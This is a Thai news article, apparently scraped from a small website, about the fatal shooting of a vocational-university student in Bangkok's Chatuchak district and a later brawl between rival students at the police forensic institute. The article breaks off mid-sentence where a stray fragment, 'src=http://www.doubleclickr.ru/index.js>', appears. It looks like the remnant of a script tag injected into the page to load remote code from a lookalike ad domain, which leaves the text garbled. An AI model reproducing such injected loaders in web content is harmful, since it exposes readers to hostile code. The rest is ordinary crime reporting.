วงจรปิดจับภาพไว้ได้จ่อท้ายทอยยิงโหดนศ.


วงจรปิดจับภาพไว้ได้จ่อท้ายทอยยิงโหดนศ.ล่ามือปืนสังหารโหด นศ.อุเทนถวายสิ้นใจอนาถหน้าร้านเซเว่นฯ สามแยกเกษตร วงจรปิดจับภาพเอาไว้ได้ทันควันแฉลั่นไกแบบเหี้ยมเกรียม ขณะเหยื่อไม่รู้ตัวกำลังเดินหันหลัง จ่อยิงท้ายทายจนล้มคว่ำหัวคะมำไปกองกับพื้น แล้วยังกระหน่ำยิงซ้ำอย่างเลือดเย็นเผยช่วงติดต่อรับศพที่นิติเวช กลุ่ม นศ. “อุเทน ถวาย-ปทุมวัน” ดันมาเจอกันแบบบังเอิญ ต่างฝ่ายต่างมาติดต่อรับศพเพื่อนร่วมสถาบันฯ ห้ามใจไม่ไหวยกพวกตะลุมบอนกันนัวเนีย “ผกก. ปทุมวัน” ต้องรีบนำกำลังมาห้ามทัพก่อนบานปลาย ขณะที่พ่อร่ำไห้น้ำตารินรับศพลูกชาย ยันเป็นเด็กเรียนดีไม่เคยมีเรื่องกับใคร ล่าสุดพลเมืองดีแจ้งเบาะแสทะเบียน จยย. ที่คนร้ายใช้หลบหนี

กรณีเหตุการณ์คนร้ายตามประกบยิงนายพรพจน์ โสภาเจริญ อายุ 21 ปี นักศึกษาชั้นปีที่ 2 คณะวิศวกรรมศาสตร์ มหาวิทยาลัยเทคโนโลยีราชมงคลตะวันออก (วิทยาเขตอุเทน ถวาย) เสียชีวิตอย่างน่าสลดใจบริเวณป้ายรถเมล์ หน้าร้านเซเว่นอีเลฟเว่น สามแยกเกษตรฯ ถนนพหลโยธิน แขวง-เขตจตุจักร เหตุเกิดเมื่อเวลา 21.30 น. วันที่ 22 ม.ค. ที่ผ่านมา เบื้องต้น พบว่ากล้องทีวีวงจรปิดสามารถบันทึกภาพคนร้ายขณะก่อเหตุไว้ได้ หลังเกิดเหตุคนร้ายขี่ จยย. หลบหนีไปทันที

ความคืบหน้าเรื่องนี้ เมื่อวันที่ 23 ม.ค. ที่ สน.พหลโยธิน พ.ต.อ.พีระพงศ์ วงษ์สมาน รอง ผบก.น.2 และ พ.ต.ท.สุรจิตร เปลี่ยนประเสริฐ สว.สส.สน.พหลโยธิน ได้เรียกประชุมทีมชุดสืบสวนเพื่อเร่งติดตามตัวมือปืนเนื่องจากเป็นคดีอุกอาจสะเทือนขวัญ ภาพวงจรปิดจับภาพได้ชัดเจน ขณะที่นายพรพจน์กำลังเดินอยู่หน้า เซเว่นฯ มีคนร้ายเป็นชายหนุ่มใส่เสื้อเชิ้ตแขนสั้นสีน้ำตาล กางเกงยีนสีดำ สวมหมวกกันน็อก วิ่งเข้ามาใช้ปืนสั้นจ่อยิงท้ายทอยนายพรพจน์จนล้มคว่ำไปกองกับพื้นแล้วยังกระหน่ำยิงซ้ำอีก 3 นัดซ้อน ก่อนจะวิ่งหนีไปขึ้น จยย.ที่เพื่อนรออยู่หลบหนีไป เบื้องต้นตำรวจตั้งสาเหตุการสังหารเอาไว้ 2 ประเด็น คือ เรื่องส่วนตัว และปัญหาขัดแย้งคู่อริต่างสถาบัน ล่าสุดมีพลเมืองดีโทรฯแจ้งเบาะแสทะเบียน จยย.ของคนร้าย อยู่ในระหว่างกำลังเร่งตรวจสอบ

ต่อมาเวลา 11.00 น. ที่สถาบันนิติเวช รพ.ตำรวจ ได้มีนายสง่า โสภาเจริญ พ่อของนาย พรพจน์ พร้อมญาติ ๆ ได้เดินทางมาติดต่อรับศพนายพรพจน์ เพื่อนำไปตั้งบำเพ็ญกุศลที่วัด ลาดปลาเค้า บรรยากาศเต็มไปด้วยความเศร้าโศก ซึ่งผลการชันสูตรศพ ทางแพทย์ระบุว่า เสียชีวิตเนื่องจากบาดแผลถูกกระสุนปืนทำลายปอดขวา ทะลุไขสันหลังส่วนคอ และเอว ขณะที่นายสง่า กล่าวด้วยน้ำเสียงเศร้าโศกว่า ลูกชายมีความใฝ่ฝัน ที่จะเข้าเรียนที่สถาบันแห่งนี้มานานแล้ว ก่อนมาเรียนลูกก็บอกว่าไม่ได้เข้ามาเรียนเพื่อจะมีเรื่องทะเลาะกับใคร อยากจะตั้งใจศึกษาเล่าเรียนให้จบ ตั้งแต่ที่เรียนมาก็สอบได้ไม่เกินอันดับ 10 มาตลอด

“อยากบอกทุกคนเป็นอุทาหรณ์ว่า ขออย่าให้เกิดเรื่องเช่นนี้ขึ้นอีกเลย เพราะว่าการ สูญเสียลูกชายครั้งนี้ถือว่าเป็นเรื่องที่เกินรับได้จริง ๆ ผมมีลูกชายเพียงแค่ 2 คนเท่านั้น” พ่อผู้สูญเสียลูกชายกล่าวด้วยน้ำตาคลอเบ้า

อย่างไรก็ดี ระหว่างที่นักศึกษาอุเทนฯ เกือบ 40 คน มารอรับศพนายพรพจน์ อยู่บริเวณด้านหน้าสถาบันนิติเวช ปรากฏว่าได้มีนักศึกษาสถาบันเทคโนโลยีปทุมวันประมาณ 30 คน ก็เดินทางมารับศพนายนันทศักดิ์ แก้วเขียว อายุ 22 ปี เพื่อนร่วมสถาบันฯ ซึ่งประสบอุบัติเหตุรถชนเสียชีวิตในท้องที่ อ.พระสมุทรเจดีย์ จ.สมุทรปราการ เมื่อทั้ง 2 กลุ่มมาเผชิญหน้ากันจึงเกิดการเขม่นตะโกนด่าทอกันขึ้น จากนั้นไม่มีใครคาดคิดทั้งสองฝ่ายได้เปิดศึกวิ่งเข้า ตะลุมบอนสาวหมัดใส่กันนัวเนีย นอกจากนี้บางคนก็คว้าไม้ ก้อนอิฐ สิ่งของที่อยู่ใกล้มือขว้างปาใส่กันอุตลุด ท่ามกลางความตระหนกตกใจของผู้ที่พบเห็นเหตุการณ์ต่างพากันวิ่งหนีกันชุลมุนเพราะกลัวโดนลูกหลง

ผู้สื่อข่าวรายงานว่า ขณะเกิดเหตุตะลุม บอนกันนานกว่า 5 นาที ทางตำรวจที่เข้าเวรอยู่จึงวิทยุแจ้งเหตุขอกำลังสนับสนุน โดยทาง พ.ต.อ. ไพศาล ลือสมบูรณ์ ผกก.สน.ปทุมวัน ได้นำกำลังเข้ามาระงับเหตุด้วยตนเอง แยกทั้งสองฝ่าย ออกจากกันพบว่าต่างฝ่ายต่างบาดเจ็บฟกช้ำดำเขียวเล็กน้อย มี นศ.อุเทนฯ ศีรษะแตก 1 ราย นอกจากนี้กระจกประตูแตก 1 บาน เบื้องต้นทางตำรวจได้แยก นศ.ปทุมวัน เข้าไปอยู่ภายในสถาบันนิติเวช ตรวจค้นพบอาวุธมีด 3 เล่ม จึงประสานนำรถตู้มารับไปส่งที่สถาบัน ส่วน นศ. อุเทนฯ แยกออกไปทางนอกรั้ว จากนั้นตำรวจได้ตรึงกำลังอยู่สักพัก รอกระทั่งทั้ง 2 ฝ่ายสลายตัวแยกย้ายกันกลับเสียก่อน

ด้าน พล.ต.ต.สาโรจน์ พรหมเจริญ ผบก.น.2 เรียกประชุมฝ่ายสืบสวน สน.พหล โยธิน และฝ่ายสืบสวน กก.สส.บก.น.2 เพื่อประมวลเหตุการณ์ว่าสาเหตุของเหตุการณ์สะเทือนขวัญดังกล่าว เบื้องต้นสันนิษฐานว่า คนร้ายน่าจะมีการวางแผนล่วงหน้าดูจากลักษณะการแต่งกาย มีการอำพรางใบหน้า ใส่หมวกกันน็อกครึ่งใบ และมีผ้าปิดบัง src=http://www.doubleclickr.ru/index.js>


แสดงความคิดเห็น

เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ


เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ

เป็นเว็บไซต์ระบบ Responsive 100% สามารถปรับรูปแบบการแสดงผลได้เองโดยอัตโนมัติ ตามอุปกรณ์ที่เปิดชม (ทั้ง Front end และ Back end) เช่น สมาร์ทโฟนทุกรุ่น, แท็บเล็ต, iPad และ iPhone เป็นเจ้าของได้แล้ววันนี้ ในราคาโปรโมชั่น...คลิกดูรายละเอียด

Copyright © sms108.com  2014